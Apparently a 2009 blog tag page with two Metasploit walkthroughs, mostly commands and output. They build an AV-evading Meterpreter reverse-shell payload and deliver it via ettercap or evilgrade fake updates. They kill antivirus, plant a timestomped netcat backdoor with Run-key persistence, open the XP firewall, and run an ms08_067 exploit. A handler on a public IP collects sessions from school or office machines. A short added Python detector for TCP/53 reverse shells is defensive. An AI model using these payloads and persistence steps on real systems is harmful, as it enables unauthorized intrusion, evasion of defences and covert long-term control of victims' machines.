Posts Tagged ‘Meterpreter’

.fun and profit with meterpreter.

Sunday, March 1st, 2009

.so let's make ur choice kiddo, with reference to the earlier article.

.meterpreter, not encoded.

neo@b0x:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=455 X > meterpreter_1.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 278
Options: LHOST=192.168.0.12,LPORT=455

http://www.virustotal.com/analisis/4b0a655b264b23b2f4dab74688c8890e
Result: 1/39

.meterpreter with XOR encoding.

neo@b0x:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=455 R | ./msfencode -e x86/shikata_ga_nai -b '' -t exe -o meterpreter_2.exe
[*] x86/shikata_ga_nai succeeded, final size 306

http://www.virustotal.com/analisis/cbb1cf1a7ce9943c5d8d15f210da8361
Result: 0/39 (0%)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.12
LHOST => 192.168.0.12
msf exploit(handler) > set LPORT 455
LPORT => 455
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

.the next move is critical, well now the attacker has to get the target to execute meterpreter_2.exe; honestly this depends on your own imagination.
.the author chose ettercap as the bridge, using an MITM method. it can be done with an ettercap filter that produces a popup every time the target browses,
.or with a combination of evilgrade ( www.infobyte.com.ar ) + ettercap with DNS spoofing, which indirectly tricks the target into applying a fake patch
for one of the programs evilgrade has modules for, e.g. winamp, winzip, notepad++; you can also add your own module to evilgrade for firefox or thunderbird (-.-)”.

.after the target executes meterpreter_2.exe.

[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.12:455 -> 192.168.0.5:1037)

meterpreter > sysinfo
Computer: PENTEST3
OS      : Windows XP (Build 2600, Service Pack 3).

.with remote desktop.
.there is also Virtual Network Computing for a look, but I prefer CLI over GUI (^^)V.

meterpreter > run getgui
-----------------passing------------------------

.kill AV.
meterpreter > run killav
[*] Killing Antivirus services on the target...

.ok, you can also edit killav.rb to add your own list of AV processes.

neo@b0x:~# vi /pentest/exploits/framework3/scripts/meterpreter/killav.rb
#
# Meterpreter script that kills all Antivirus processes
# Provided by: Jerome Athias 
#

print_status("Killing Antivirus services on the target...")

avs = %W{
        AAWTray.exe
        Ad-Aware.exe
        MSASCui.exe
        _avp32.exe
        _avpcc.exe
        _avpm.exe
        aAvgApi.exe
        ackwin32.exe
        adaware.exe
        advxdwin.exe
        agentsvr.exe
        agentw.exe
        alertsvc.exe
        alevir.exe
        alogserv.exe
        amon9x.exe
        anti-trojan.exe
-----------------cut------------------------

windows enumeration

meterpreter > run winenum
[*] Running Windows Local Enumerion Meterpreter Script
[*] New session on 192.168.0.5:1037...
[*] Saving report to /neo/.msf3/logs/winenum/192.168.0.5_20090216.174854613/192.168.0.5_20090216.174854613.txt
[*] Checking if PENTEST3 is a Virtual Machine ........
[*]     This is a VMWare virtual Machine
[*] Running Command List ...
[*]     running command cmd.exe /c set
[*]     running command arp -a
[*]     running command ipconfig /all
[*]     running command ipconfig /displaydns
[*]     running command route print
[*]     running command net view
[*]     running command netstat -nao
[*]     running command netstat -vb
[*]     running command netstat -ns
[*]     running command net accounts
[*]     running command net accounts /domain
[*]     running command net session
-----------------cut------------------------

example winenum output

neo@b0x:~# cat /neo/.msf3/logs/winenum/192.168.0.5_20090216.174854613/192.168.0.5_20090216.174854613.txt
Date:       2009-02-16.02:17:48
Running as: PENTEST3\pentest3
Host:       PENTEST3
OS:         Windows XP (Build 2600, Service Pack 3).

This is a VMWare virtual Machine

*****************************************
      Output of cmd.exe /c set
*****************************************
ALLUSERSPROFILE=C:\Documents and Settings\All Users
APPDATA=C:\Documents and Settings\pentest3\Application Data
CLIENTNAME=Console
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=PENTEST3
ComSpec=C:\WINDOWS\system32\cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Documents and Settings\pentest3
LOGONSERVER=\\PENTEST3
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 15 Stepping 13, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0f0d
ProgramFiles=C:\Program Files
PROMPT=$P$G
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\DOCUME~1\pentest3\LOCALS~1\Temp
TMP=C:\DOCUME~1\pentest3\LOCALS~1\Temp
USERDOMAIN=PENTEST3
-----------------cut------------------------

.what about the winenum ruby script in framework3/scripts/meterpreter/winenum.rb.
.the author modified it so that what gets dumped is My Documents instead of the registry ^_^V.

.netcat as backdoor.
.the swiss army knife uses TCP and UDP to make connections; the author will cover using it as a backd00r on a wind#ws b0x.
.even though many antivirus products treat netcat as a hacktool.

meterpreter > use priv
Loading extension priv...success.

meterpreter > upload /tmp/system32.exe C:\\windows\\system32\\
[*] uploading  : /tmp/system32.exe -> C:\windows\system32\
[*] uploaded   : /tmp/system32.exe -> C:\windows\system32\\system32.exe

.change file times.

meterpreter > timestomp C:\\windows\\system32\\system32.exe -v
Modified      : Tue Feb 24 20:27:49 -0500 2009
Accessed      : Thu Feb 26 09:29:39 -0500 2009
Created       : Tue Feb 24 20:27:49 -0500 2009
Entry Modified: Thu Feb 26 09:29:39 -0500 2009

meterpreter > timestomp C:\\windows\\system32\\system32.exe -b
[*] Blanking file MACE attributes on C:\windows\system32\system32.exe

meterpreter > timestomp C:\\windows\\system32\\system32.exe -f C:\\windows\\system32\\cmd.exe
[*] Setting MACE attributes on C:\windows\system32\system32.exe from C:\windows\system32\cmd.exe

meterpreter > timestomp C:\\windows\\system32\\system32.exe -v
Modified      : Sun Apr 13 18:42:16 -0400 2008
Accessed      : Sat Feb 28 05:06:19 -0500 2009
Created       : Thu Aug 23 08:00:00 -0400 2001
Entry Modified: Sat Feb 28 05:06:19 -0500 2009

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values (3):

        SunJavaUpdateSched
        VMware Tools
        VMware User Process

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
Successful set system32.

meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: system32
Type: REG_SZ
Data: C:\windows\system32\system32.exe -Ldp 455 -e cmd.exe

.bypass the XP default firewall.
.there are 2 methods to bypass the XP firewall: via the registry or via the network shell (netsh).

.with registry edit.

meterpreter > reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list
Enumerating: HKLM\system\controlset001services\sharedaccess\parameters\firewallpolicy\Standardprofile\authorizedapplications\list

No children.

meterpreter > reg setval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32 -d "C:\WINDOWS\system32\system32.exe:*:Enabled:system32"
Successful set system32.

meterpreter > reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32
Key: HKLM\system\controlset001services\sharedaccess\parameters\firewallpolicy\Standardprofile\authorizedapplications\list
Name: system32
Type: REG_SZ
Data: C:WINDOWSsystem32system32.exe:*:Enabled:system32

.with the “netsh” command.

C:\Documents and Settings\pentest3\Desktop>Netsh firewall show opmode
Netsh firewall show opmode

Domain profile configuration:
-------------------------------------------------------------------
Operational mode                  = Enable
Exception mode                    = Enable

Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode                  = Enable <<<< this
Exception mode                    = Enable <<<< this

Local Area Connection 2 firewall configuration:
-------------------------------------------------------------------
Operational mode                  = Enable

.the interesting firewall settings there are the operational and exception modes, both of which are enabled.
.so the attacker can add an open port.

C:\Documents and Settings\pentest3\Desktop>netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
ok.

C:\Documents and Settings\pentest3\Desktop>netsh firewall show portopening
netsh firewall show portopening

Port configuration for Domain profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
455    TCP       Enable   Service Firewall              <<<< this
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

.change the target's XP desktop wallpaper.
.by default XP names its desktop wallpaper wallpaper1.bmp, so we can replace it.
.is this funny?.

meterpreter > upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"
[*] uploading  : /neo/wallpaper1.bmp -> C:\documents and settings\pentest3\local settings\application data\microsoft\
[*] uploaded   : /neo/wallpaper1.bmp -> C:\documents and settings\pentest3\local settings\application data\microsoft\\wallpaper1.bmp

meterpreter > execute -H -i -f cmd.exe
Process 1096 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\pentest3\Desktop>

.one more funny thing.
.with the shutdown command the attacker can shut down/restart with a timeout, with a funny message.

C:\Documents and Settings\pentest3\Desktop>shutdown -r -f -c "::your box are belong to us::" -t 13
shutdown -r -f -c "::your box are belong to us::" -t 13

msf > connect 192.168.0.5 455
[*] Connected to 192.168.0.5:455
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\pentest3>  

are u having fun kidd0?

upgrade ur evil mind and imagination, explore out of the sphere, think out of the box
make ur choice;

EOF--

Metasploit: Backdooring

Sunday, February 22nd, 2009

Some of you may already know that metasploit can be used to build a backdoor; this was also touched on in the toket New Year 2009 edition. Such a backdoor is very useful, especially as a post-exploitation method. In this example we will use the 2 basic methods of obtaining a shell from a target: bind_tcp and reverse_tcp.

With bind_tcp, the backdoor runs on the target and the target opens a port on its own system. So once exploitation is finished, we can get into the target at any time via the port that the backdoor has opened.

$ ./msfpayload windows/meterpreter/bind_tcp LPORT=4321 RHOST=10.10.96.143 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
 Length: 307
Options: LPORT=4321,RHOST=10.10.96.143,EXITFUNC=thread

That backdoor will open port 4321 on the target 10.10.96.143. How the backdoor gets run is up to us; it may be planted and executed after exploitation of the target has finished, like so:


msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (10.10.97.14:31338 -> 10.10.96.143:4780)

meterpreter > cd \
meterpreter > pwd
C:\
meterpreter > upload MicrosoftDS.exe
[*] uploading  : MicrosoftDS.exe -> MicrosoftDS.exe
[*] uploaded   : MicrosoftDS.exe -> MicrosoftDS.exe
meterpreter > execute -f MicrosoftDS.exe -H
Process 2348 created.

Later on, we can get into the target machine without exploiting it again, simply by opening a connection to the port defined earlier.


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set LPORT 4321
LPORT => 4321
msf exploit(handler) > set RHOST 10.10.96.143
RHOST => 10.10.96.143
msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (10.10.97.14:58798 -> 10.10.96.143:4321)

meterpreter >

The second method uses a reverse shell. A reverse shell is used mainly when the target's network is restricted by a firewall so that connections cannot be opened to every port (typical of an internal network). So if you get the chance to hack one of the machines in an internal network (e.g. a school computer, an office computer, an internet-cafe computer, etc.) and still want that shell access anytime and anywhere, you can use metasploit's multi-handler to receive the reverse shell. We can set up the multi-handler on machines reachable from anywhere on the internet, for example a hosting box, a looted server, etc.


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------  

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port                        

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target  

msf exploit(handler) > set LPORT 53
LPORT => 53
msf exploit(handler) > set LHOST 222.124.199.76
LHOST => 222.124.199.76
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

Next, just build the backdoor in the reverse_shell category:


$ ./msfpayload windows/meterpreter/reverse_tcp LPORT=53 LHOST=222.124.199.76 EXITFUNC=thread X > MicrosoftDS.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 278
Options: LPORT=53,LHOST=222.124.199.76,EXITFUNC=thread
$ file MicrosoftDS.exe
MicrosoftDS.exe: MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit

And when it is run (whether through a post-exploitation session or manually by a mouse double-click :P ), the multi-handler will show:


[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (222.124.199.76:53 -> 10.10.96.143:4831)

meterpreter > 

The nice thing about metasploit's multi-handler is that we can hold many sessions at once; in the example above you can see one multi-handler set to ExitOnSession==false handling many reverse_shells simultaneously. And we can interact with those sessions whenever we want:


msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  3   Meterpreter  222.124.199.76:53 -> 10.10.96.146:4831
  4   Meterpreter  222.124.199.76:53 -> 10.10.96.223:4836
  5   Meterpreter  222.124.199.76:53 -> 10.10.96.215:4838
  6   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4840
  7   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4845
  8   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4846
  9   Meterpreter  222.124.199.76:53 -> 172.16.96.143:4847  

msf exploit(handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer: PROGWAR
OS      : Windows XP (Build 2600, ).
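The reverse-shell setup described above (egress allowed only on a few ports, the handler listening on TCP/53 and collecting sessions from many internal clients) is also what makes it visible in flow data: DNS rarely uses TCP, never stays connected for an hour, and resolvers are few and known. The following is an added example, not part of the original post: it flags TCP/53 flows to anything other than a sanctioned resolver, marks long-lived ones, and groups offending sources per destination. The flow records, the resolver address 10.10.1.53 and the duration threshold are constructed; the internal hosts and 222.124.199.76 are taken from the post's sessions table.

```python
from collections import defaultdict

# Constructed connection records (src, dst, proto, dst_port, duration_s) modelled on
# the post's sessions table: internal hosts holding TCP connections to 222.124.199.76:53.
# The resolver 10.10.1.53 and the web flow are constructed benign controls.
FLOWS = [
    ("10.10.96.146", "222.124.199.76", "TCP", 53, 3600),
    ("10.10.96.223", "222.124.199.76", "TCP", 53, 2950),
    ("172.16.96.143", "222.124.199.76", "TCP", 53, 4010),
    ("172.16.96.143", "222.124.199.76", "TCP", 53, 3990),
    ("10.10.96.146", "10.10.1.53", "UDP", 53, 0),
    ("10.10.96.146", "10.10.1.53", "TCP", 53, 1),   # legitimate TCP fallback to the resolver
    ("10.10.96.223", "93.184.216.34", "TCP", 80, 12),
]
RESOLVERS = {"10.10.1.53"}   # constructed list of sanctioned DNS servers
LONG_LIVED_S = 300           # a DNS exchange completes in well under this

def suspicious_dns_port_flows(flows, resolvers, long_lived_s=LONG_LIVED_S):
    """Return (src, dst, reasons) for TCP/53 flows that do not go to a sanctioned resolver."""
    findings = []
    for src, dst, proto, dport, dur in flows:
        if proto != "TCP" or dport != 53 or dst in resolvers:
            continue
        reasons = ["TCP/53 to a host that is not a sanctioned resolver"]
        if dur >= long_lived_s:
            reasons.append(f"held open {dur}s, far longer than a DNS exchange")
        findings.append((src, dst, reasons))
    return findings

def fan_in(findings):
    """Group offending sources per destination: one external host collecting many internal clients."""
    by_dst = defaultdict(set)
    for src, dst, _ in findings:
        by_dst[dst].add(src)
    return {dst: sorted(srcs) for dst, srcs in by_dst.items()}
```

With real NetFlow or firewall logs the same two functions apply unchanged; the fan-in view is what distinguishes a single odd client from a handler collecting the whole subnet.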

Those are a few examples of using metasploit for backdooring; there are many other creative examples, especially the kiddie-flavoured and evil-in-mind ones. Oh, and in the examples above I used the meterpreter payload repeatedly. Meterpreter will be discussed next.

Stay tuned *heh, I feel like a soap opera host*